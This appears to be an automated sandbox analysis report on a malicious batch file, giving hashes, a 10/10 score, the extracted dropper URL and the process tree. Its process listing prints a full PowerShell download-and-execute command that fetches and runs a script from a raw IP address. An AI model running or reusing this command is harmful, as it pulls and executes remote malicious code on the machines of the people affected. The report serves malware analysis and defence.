Analysis
-
max time kernel
147s -
max time network
92s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
12-07-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
d8b4df362b6cf1bf526634ea889b42de.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
d8b4df362b6cf1bf526634ea889b42de.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
d8b4df362b6cf1bf526634ea889b42de.bat
-
Size
213B
-
MD5
fa5f98db7255446f6688e03c1b8639e1
-
SHA1
9149b6cdcab524d9e06254b52dcdcb0455cdb7ac
-
SHA256
b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca
-
SHA512
e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de
Signatures
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3768 wrote to memory of 2932 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 2932 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 2932 3768 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 816 2932 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 816 WerFault.exe Token: SeBackupPrivilege 816 WerFault.exe Token: SeDebugPrivilege 816 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7043⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/816-1-0x0000000004DA0000-0x0000000004DA1000-memory.dmpFilesize
4KB
-
memory/816-9-0x00000000053D0000-0x00000000053D1000-memory.dmpFilesize
4KB
-
memory/2932-0-0x0000000000000000-mapping.dmp
-
memory/2932-2-0x0000000000000000-mapping.dmp
-
memory/2932-3-0x0000000000000000-mapping.dmp
-
memory/2932-4-0x0000000000000000-mapping.dmp
-
memory/2932-5-0x0000000000000000-mapping.dmp
-
memory/2932-6-0x0000000000000000-mapping.dmp
-
memory/2932-7-0x0000000000000000-mapping.dmp